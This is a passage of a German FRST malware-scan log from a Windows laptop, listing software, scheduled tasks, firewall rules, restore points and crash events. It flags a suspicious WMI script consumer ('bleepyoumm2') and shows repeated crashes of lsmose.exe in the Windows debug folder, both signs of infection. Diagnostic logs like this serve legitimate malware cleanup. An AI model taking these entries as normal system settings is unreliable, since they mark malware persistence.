Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM-x32\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 55.0.3 (x64 de) (HKLM\...\Mozilla Firefox 55.0.3 (x64 de)) (Version: 55.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 55.0.3 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MyWinLocker (HKLM-x32\...\{0D7CD0D9-4A88-4A63-8F91-3F4E8F371768}) (Version: 3.1.212.0 - Egis Technology Inc.) Hidden
MyWinLocker Suite (HKLM-x32\...\{738BF5C3-AF7B-4BB0-B7EF-E505EFC756BE}) (Version: 3.1.212.0 - Egis Technology Inc.) Hidden
MyWinLocker Suite (HKLM-x32\...\InstallShield_{738BF5C3-AF7B-4BB0-B7EF-E505EFC756BE}) (Version: 3.1.212.0 - Egis Technology Inc.)
NTI Backup Now 5 (HKLM-x32\...\InstallShield_{12EFA1A4-AC3B-443C-8143-237EDE760403}) (Version: 5.1.2.630 - NewTech Infosystems)
NTI Backup Now Standard (HKLM-x32\...\{12EFA1A4-AC3B-443C-8143-237EDE760403}) (Version: 5.1.2.630 - NewTech Infosystems) Hidden
NTI Media Maker 8 (HKLM-x32\...\{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6636 - NewTech Infosystems) Hidden
NTI Media Maker 8 (HKLM-x32\...\InstallShield_{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6636 - NewTech Infosystems)
PX Profile Update (HKLM-x32\...\{D1079D9F-7778-366C-AA9F-F3AC68EC8141}) (Version: 1.00.1. - AMD) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6050 - Realtek Semiconductor Corp.)
RogueKiller version 12.11.11.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 12.11.11.0 - Adlice Software)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Shredder (HKLM\...\{1F557316-CFC0-41BD-AFF7-8BC49CE444D7}) (Version: 2.0.8.3 - Egis Technology Inc.) Hidden
Shredder (HKLM-x32\...\{C2695E83-CF1D-43D1-84FE-B3BEC561012A}) (Version: 2.0.8.3 - Egis Technology Inc.) Hidden
Snagit 9.1 (HKLM-x32\...\{0E6ED660-498C-42F7-9EF4-FB0C96DFC01A}) (Version: 9.1.0.206 - TechSmith Corporation)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.0.12.0 - Synaptics Incorporated)
Überwachungstool für die Intel® Turbo-Boost-Technik (HKLM\...\{39F4C6F9-618A-4E5B-8FB2-6BD661174E32}) (Version: 1.0.186.6 - Intel)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.2 - VideoLAN)
VMware Player (HKLM\...\{E452E727-86B8-4233-8CC3-41FD817AFAFF}) (Version: 5.0.1 - VMware, Inc.) Hidden
VMware Player (HKLM-x32\...\VMware_Player) (Version: 5.0.1 - VMware, Inc)
Welcome Center (HKLM-x32\...\Acer Welcome Center) (Version: 1.02.3004 - Acer Incorporated)
Windows Live Anmelde-Assistent (HKLM-x32\...\{52B97218-98CB-4B8B-9283-D213C85E1AA4}) (Version: 5.000.818.5 - Microsoft Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{586509F0-350D-48B5-B763-9CC2F8D96C4C}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live-Uploadtool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ShellIconOverlayIdentifiers: [egisPSDP] -> {30A0A3F6-38AC-4C53-BB8B-0D95238E25BA} => C:\Program Files (x86)\EgisTec MyWinLocker\x64\psdprotect.dll [2010-05-27] (Egis Technology Inc.)
ShellIconOverlayIdentifiers-x32: [egisPSDP] -> {30A0A3F6-38AC-4C53-BB8B-0D95238E25BA} => C:\Program Files (x86)\EgisTec MyWinLocker\x64\psdprotect.dll [2010-05-27] (Egis Technology Inc.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers1: [EDSshellExt] -> {29FF7AB0-BE34-4992-A30B-53A9D86EE239} => C:\Program Files (x86)\EgisTec MyWinLocker\x64\mwlshellext.dll [2010-05-27] (Egis Technology Inc.)
ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers1: [SnagItMainShellExt] -> {CF74B903-3389-469c-B3B6-0204D204FCBD} => C:\Program Files (x86)\TechSmith\Snagit 9\DLLx64\SnagitShellExt64.dll [2008-11-06] (TechSmith Corporation)
ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers2-x32: [VMDiskMenuHandler] -> {271DC252-6FE1-4D59-9053-E4CF50AB99DE} => C:\Program Files (x86)\VMware\VMware Player\vmdkShellExt.dll [2012-11-01] (VMware, Inc.)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-08-21] (Malwarebytes)
ContextMenuHandlers3: [ShredderContextMenu] -> {521065F1-DE6C-4E46-BBCB-89B0D0BE860D} => C:\Program Files (x86)\EgisTec Shredder\x64\ShredderContextMenu.dll [2010-04-02] (Egis Technology Inc.)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers4: [EDSshellExt] -> {29FF7AB0-BE34-4992-A30B-53A9D86EE239} => C:\Program Files (x86)\EgisTec MyWinLocker\x64\mwlshellext.dll [2010-05-27] (Egis Technology Inc.)
ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => c:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers4: [SnagItMainShellExt] -> {CF74B903-3389-469c-B3B6-0204D204FCBD} => C:\Program Files (x86)\TechSmith\Snagit 9\DLLx64\SnagitShellExt64.dll [2008-11-06] (TechSmith Corporation)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\atiacm64.dll [2010-06-06] (Advanced Micro Devices, Inc.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2010-06-05] (Intel Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-08-21] (Malwarebytes)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0B1F3F91-2689-4F5C-854E-7A0B6E233FC7} - System32\Tasks\{43196D44-4B99-47B4-B0EC-DDFE69954C12} => C:\Install\Picture Publisher 8 (aus Chip)\picpub8.exe [2001-03-09] (nobox.de)
Task: {172CA117-81F3-496A-BEC5-854ADC0292A8} - System32\Tasks\{2E9D12B7-53DA-444A-AF13-5D8BB748B7E6} => C:\Program Files (x86)\Micrografx\Picture Publisher 10\Pp10.exe [2001-09-17] ()
Task: {19CDCFDB-77D8-45F8-A470-CBE53E2AEC6F} - System32\Tasks\{0B49C5FD-F9D9-4334-BF14-DD41347EA35C} => C:\Install\Picture Publisher 8 (aus Chip)\picpub8.exe [2001-03-09] (nobox.de)
Task: {669B4C8B-4E97-48DF-9CDE-B141DBB40C30} - System32\Tasks\{FE746BE6-1F18-489C-911E-47288FEDC11C} => C:\Install\Picture Publisher 8 (aus Chip)\picpub8.exe [2001-03-09] (nobox.de)
Task: {7CBB404C-EA2B-4FC1-9136-F2E27B90A67F} - System32\Tasks\{60959579-FE2D-427C-ABE9-B79FEF4451B2} => C:\Install\Picture Publisher 8 (aus Chip)\picpub8.exe [2001-03-09] (nobox.de)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

WMI_ActiveScriptEventConsumer_bleepyoumm2_consumer: <==== ACHTUNG

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2010-11-03 02:20 - 2010-02-03 10:37 - 000244904 ____N () C:\Program Files (x86)\Cyberlink\Shared files\RichVideo.exe
2017-08-28 06:20 - 2017-08-21 07:20 - 002264520 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2010-03-26 11:41 - 2010-03-26 11:41 - 000016384 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2010-11-03 01:52 - 2010-11-03 01:52 - 000270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2010-06-29 00:20 - 2010-06-29 00:20 - 000465576 _____ () C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\sqlite3.dll
2010-06-29 00:12 - 2010-06-29 00:12 - 001081600 _____ () C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\ACE.dll
2012-11-01 03:34 - 2012-11-01 03:34 - 001260184 _____ () C:\Program Files (x86)\VMware\VMware Player\libxml2.dll
2010-09-08 10:17 - 2009-05-20 08:02 - 000072200 _____ () C:\Program Files (x86)\Launch Manager\CdDirIo.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\ProgramData\Temp:0B9176C0 [244]
AlternateDataStreams: C:\ProgramData\Temp:4D066AD2 [240]
AlternateDataStreams: C:\ProgramData\Temp:5D7E5A8F [290]
AlternateDataStreams: C:\ProgramData\Temp:798A3728 [238]
AlternateDataStreams: C:\ProgramData\Temp:CDFF58FE [288]
AlternateDataStreams: C:\ProgramData\Temp:E1F04E8D [260]
AlternateDataStreams: C:\ProgramData\Temp:E36F5B57 [272]
AlternateDataStreams: C:\ProgramData\Temp:E3C56885 [240]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)

==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2009-06-10 23:00 - 000000824 _____ C:\Windows\system32\Drivers\etc\hosts

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-4004736709-471984187-2621406794-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\a_omuell\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 83.169.186.161 - 83.169.186.225
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{29CFBFA6-D0C9-4D1F-BCCA-DC1A79A0A62F}] => (Allow) C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\BackupSvc.exe
FirewallRules: [{B2BA4C44-1E2B-44D7-9DDA-98AFFE63C879}] => (Allow) C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\SchedulerSvc.exe
FirewallRules: [{54472E90-D9B7-475C-A695-6DAE862C081F}] => (Allow) C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\BackupSvc.exe
FirewallRules: [{907AA42A-5D3E-4186-AA2F-6BFF370CD11C}] => (Allow) C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\SchedulerSvc.exe
FirewallRules: [{639F54AF-2600-4EAD-BCC7-78709473EDBC}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\wlcsdk.exe
FirewallRules: [{B5B8E26F-BCB3-4013-9805-C9AECCDDAF62}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{BC38C87B-0D24-44AD-8D10-F639EC23717C}] => (Allow) svchost.exe
FirewallRules: [{CDA8B321-8D67-4537-B8AB-BA012FCFEB0F}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [{B147711E-2BD7-4998-8423-B39B833B3542}] => (Allow) C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\PowerCinema.exe
FirewallRules: [{B79495F4-3C5F-4DF2-9D79-B85B8BF4BE4B}] => (Allow) C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\PCMService.exe
FirewallRules: [{14611F0F-C0E1-4C1D-BB85-7D42CABE86A0}] => (Allow) C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\Kernel\DMP\CLBrowserEngine.exe
FirewallRules: [{50724000-8748-44E1-B6EB-6804162204FA}] => (Allow) C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\Kernel\DMS\CLMSService.exe
FirewallRules: [{7FAED6AD-9B0A-4B7B-835A-8E546181FD02}] => (Allow) C:\Program Files (x86)\Acer Arcade Deluxe\HomeMedia\HomeMedia.exe
FirewallRules: [{ED1EFEE3-0C1D-4792-B24C-2BDD1DEBB754}] => (Allow) C:\Program Files (x86)\Acer Arcade Deluxe\Arcade Movie\TouchMovie.exe
FirewallRules: [{DFFCCBE0-856E-42DB-A826-FAE034BC2F25}] => (Allow) C:\Program Files (x86)\Acer Arcade Deluxe\Arcade Movie\TouchMovieService.exe
FirewallRules: [{7C23EDA1-7AB7-4F8C-940C-CAD661BD2FA9}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{21904D27-7EFC-4286-A494-127F678AF100}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{A3E447FB-A74A-4CF4-B57C-53ECDA08EAE5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{0BA0D5EE-2962-4C7D-B35B-52DEC3547CE8}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{0B4BCF9F-9655-41CB-B152-2E0CEBD94975}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{008682FC-53B8-4221-97B4-D78AF96A2FAF}] => (Block) LPort=445
FirewallRules: [{25718DF1-4A09-4870-9A5E-9EB93C47C0B2}] => (Block) LPort=445
FirewallRules: [{3FED1C3D-F7E7-4291-A722-E5DF6F67AEC4}] => (Block) LPort=445
FirewallRules: [{245D9C6F-9FAA-4C33-A7CD-5779BED2D8A0}] => (Block) LPort=445
FirewallRules: [{5DF3CECF-E181-4E92-8AD0-F911432B44CA}] => (Block) LPort=445
FirewallRules: [{4CC02B21-69AD-4157-BBAF-2C3A65502884}] => (Block) LPort=445
FirewallRules: [{7AF19709-2262-4ADD-9449-7811E80E6179}] => (Block) LPort=445
FirewallRules: [{5EDAEA89-1A46-4215-92B2-D1F9A3E97D8E}] => (Block) LPort=445
FirewallRules: [{713B4165-D114-4FB8-89E3-30B071B675BA}] => (Block) LPort=445
FirewallRules: [{A374203F-F2DA-4B8C-A4E5-50F652A0D5B7}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{2D19C583-4280-4311-8107-4BFDBBF7E206}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe

==================== Wiederherstellungspunkte =========================

27-07-2017 20:56:25 Windows Update
27-07-2017 21:17:15 Windows Update
31-07-2017 16:20:03 Windows Update
06-08-2017 20:55:03 Windows Update
09-08-2017 21:56:55 Windows Update
12-08-2017 22:08:17 Windows Update
16-08-2017 17:20:51 Windows Update
19-08-2017 17:33:20 Windows Update
22-08-2017 19:02:23 Windows Update
24-08-2017 17:00:33 Removed Microsoft Silverlight
27-08-2017 21:22:24 Windows Update
28-08-2017 20:47:23 JRT Pre-Junkware Removal

==================== Fehlerhafte Geräte im Gerätemanager =============

==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (08/28/2017 05:44:05 AM) (Source: Application Error) (EventID: 1005) (User: )
Description: Aus einem der folgenden Gründe kann nicht auf die Datei "" zugegriffen werden:
Es besteht ein Problem mit der Netzwerkverbindung, dem Datenträger mit der gespeicherten Datei bzw. den auf dem Computer installierten
Speichertreibern, oder der Datenträger fehlt.
Das Programm Mediatek Wireless LAN Card Utility wurde wegen dieses Fehlers geschlossen.

Programm: Mediatek Wireless LAN Card Utility
Datei:

Der Fehlerwert ist im Abschnitt "Zusätzliche Dateien" aufgelistet.
Benutzeraktion
1. Öffnen Sie die Datei erneut.
Diese Situation ist eventuell ein temporäres Problem, das selbstständig behoben wird, wenn das Programm erneut ausgeführt wird.
2.
Wenn Sie weiterhin nicht auf die Datei zugreifen können und
 - diese sich im Netzwerk befindet,
dann sollte der Netzwerkadministrator überprüfen, dass kein Netzwerkproblem besteht und dass eine Verbindung mit dem Server hergestellt werden kann.
 - diese sich auf einem Wechseldatenträger, wie z. B. einer Diskette oder einer CD, befindet, überprüfen Sie, ob der Datenträger richtig in den Computer eingelegt ist.
3. Überprüfen und reparieren Sie das Dateisystem, indem Sie CHKDSK ausführen. Klicken Sie dazu im Menü "Start" auf "Ausführen", geben Sie CMD ein, und klicken Sie auf "OK". Geben Sie an der Eingabeaufforderung CHKDSK /F ein, und drücken Sie die EINGABETASTE.
4. Stellen Sie die Datei von einer Sicherungskopie wieder her, wenn das Problem weiterhin besteht.
5. Überprüfen Sie, ob andere Dateien auf demselben Datenträger geöffnet werden können. Falls dies nicht möglich ist, ist der Datenträger eventuell beschädigt.
Wenden Sie sich an den Administrator oder den Hersteller der Computerhardware, um weitere Unterstützung zu erhalten, wenn es sich um eine Festplatte handelt.

Zusätzliche Daten
Fehlerwert: 3F2F17DE
Datenträgertyp: 0

Error: (08/28/2017 05:44:05 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Name des fehlerhaften Moduls: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Ausnahmecode: 0xc000001d
Fehleroffset: 0x00000000000117de
ID des fehlerhaften Prozesses: 0x1374
Startzeit der fehlerhaften Anwendung: 0x01d31fafe2d4e766
Pfad der fehlerhaften Anwendung: c:\windows\debug\lsmose.exe
Pfad des fehlerhaften Moduls: c:\windows\debug\lsmose.exe
Berichtskennung: 237667dd-8ba3-11e7-bce6-005056c00008

Error: (08/27/2017 09:57:43 PM) (Source: Application Error) (EventID: 1005) (User: )
Description: Aus einem der folgenden Gründe kann nicht auf die Datei "" zugegriffen werden:
Es besteht ein Problem mit der Netzwerkverbindung, dem Datenträger mit der gespeicherten Datei bzw. den auf dem Computer installierten
Speichertreibern, oder der Datenträger fehlt.
Das Programm Mediatek Wireless LAN Card Utility wurde wegen dieses Fehlers geschlossen.

Programm: Mediatek Wireless LAN Card Utility
Datei:

Der Fehlerwert ist im Abschnitt "Zusätzliche Dateien" aufgelistet.
Benutzeraktion
1. Öffnen Sie die Datei erneut.
Diese Situation ist eventuell ein temporäres Problem, das selbstständig behoben wird, wenn das Programm erneut ausgeführt wird.
2.
Wenn Sie weiterhin nicht auf die Datei zugreifen können und
 - diese sich im Netzwerk befindet,
dann sollte der Netzwerkadministrator überprüfen, dass kein Netzwerkproblem besteht und dass eine Verbindung mit dem Server hergestellt werden kann.
 - diese sich auf einem Wechseldatenträger, wie z. B. einer Diskette oder einer CD, befindet, überprüfen Sie, ob der Datenträger richtig in den Computer eingelegt ist.
3. Überprüfen und reparieren Sie das Dateisystem, indem Sie CHKDSK ausführen. Klicken Sie dazu im Menü "Start" auf "Ausführen", geben Sie CMD ein, und klicken Sie auf "OK". Geben Sie an der Eingabeaufforderung CHKDSK /F ein, und drücken Sie die EINGABETASTE.
4. Stellen Sie die Datei von einer Sicherungskopie wieder her, wenn das Problem weiterhin besteht.
5. Überprüfen Sie, ob andere Dateien auf demselben Datenträger geöffnet werden können. Falls dies nicht möglich ist, ist der Datenträger eventuell beschädigt.
Wenden Sie sich an den Administrator oder den Hersteller der Computerhardware, um weitere Unterstützung zu erhalten, wenn es sich um eine Festplatte handelt.

Zusätzliche Daten
Fehlerwert: 3F0717DE
Datenträgertyp: 0

Error: (08/27/2017 09:57:43 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Name des fehlerhaften Moduls: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Ausnahmecode: 0xc000001d
Fehleroffset: 0x00000000000117de
ID des fehlerhaften Prozesses: 0x528
Startzeit der fehlerhaften Anwendung: 0x01d31f6ebc3866df
Pfad der fehlerhaften Anwendung: c:\windows\debug\lsmose.exe
Pfad des fehlerhaften Moduls: c:\windows\debug\lsmose.exe
Berichtskennung: fcc93db5-8b61-11e7-8dfa-005056c00008

Error: (08/27/2017 09:10:57 PM) (Source: Application Error) (EventID: 1005) (User: )
Description: Aus einem der folgenden Gründe kann nicht auf die Datei "" zugegriffen werden:
Es besteht ein Problem mit der Netzwerkverbindung, dem Datenträger mit der gespeicherten Datei bzw. den auf dem Computer installierten
Speichertreibern, oder der Datenträger fehlt.
Das Programm Mediatek Wireless LAN Card Utility wurde wegen dieses Fehlers geschlossen.

Programm: Mediatek Wireless LAN Card Utility
Datei:

Der Fehlerwert ist im Abschnitt "Zusätzliche Dateien" aufgelistet.
Benutzeraktion
1. Öffnen Sie die Datei erneut.
Diese Situation ist eventuell ein temporäres Problem, das selbstständig behoben wird, wenn das Programm erneut ausgeführt wird.
2.
Wenn Sie weiterhin nicht auf die Datei zugreifen können und
 - diese sich im Netzwerk befindet,
dann sollte der Netzwerkadministrator überprüfen, dass kein Netzwerkproblem besteht und dass eine Verbindung mit dem Server hergestellt werden kann.
 - diese sich auf einem Wechseldatenträger, wie z. B. einer Diskette oder einer CD, befindet, überprüfen Sie, ob der Datenträger richtig in den Computer eingelegt ist.
3. Überprüfen und reparieren Sie das Dateisystem, indem Sie CHKDSK ausführen. Klicken Sie dazu im Menü "Start" auf "Ausführen", geben Sie CMD ein, und klicken Sie auf "OK". Geben Sie an der Eingabeaufforderung CHKDSK /F ein, und drücken Sie die EINGABETASTE.
4. Stellen Sie die Datei von einer Sicherungskopie wieder her, wenn das Problem weiterhin besteht.
5. Überprüfen Sie, ob andere Dateien auf demselben Datenträger geöffnet werden können. Falls dies nicht möglich ist, ist der Datenträger eventuell beschädigt.
Wenden Sie sich an den Administrator oder den Hersteller der Computerhardware, um weitere Unterstützung zu erhalten, wenn es sich um eine Festplatte handelt.

Zusätzliche Daten
Fehlerwert: 3FD817DE
Datenträgertyp: 0

Error: (08/27/2017 09:10:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Name des fehlerhaften Moduls: lsmose.exe, Version: 5.0.9.19, Zeitstempel: 0x59747423
Ausnahmecode: 0xc000001d
Fehleroffset: 0x00000000000117de
ID des fehlerhaften Prozesses: 0x10fc
Startzeit der fehlerhaften Anwendung: 0x01d31f6830a457ea
Pfad der fehlerhaften Anwendung: c:\windows\debug\lsmose.exe
Pfad des fehlerhaften Moduls: c:\windows\debug\lsmose.exe
Berichtskennung: 74360b38-8b5b-11e7-bf0c-005056c00008

Error: (08/27/2017 08:08:30 PM) (Source: Application Error) (EventID: 1005) (User: )
Description: Aus einem der folgenden Gründe kann nicht auf die Datei "" zugegriffen werden:
Es besteht ein Problem mit der Netzwerkverbindung, dem Datenträger mit der gespeicherten Datei bzw. den auf dem Computer installierten
Speichertreibern, oder der Datenträger fehlt.
Das Programm Mediatek Wireless LAN Card Utility wurde wegen dieses Fehlers geschlossen.

Programm: Mediatek Wireless LAN Card Utility
Datei:

Der Fehlerwert ist im Abschnitt "Zusätzliche Dateien" aufgelistet.
Benutzeraktion
1. Öffnen Sie die Datei erneut.
Diese Situation ist eventuell ein temporäres Problem, das selbstständig behoben wird, wenn das Programm erneut ausgeführt wird.
2.
Wenn Sie weiterhin nicht auf die Datei zugreifen können und
 - diese sich im Netzwerk befindet,
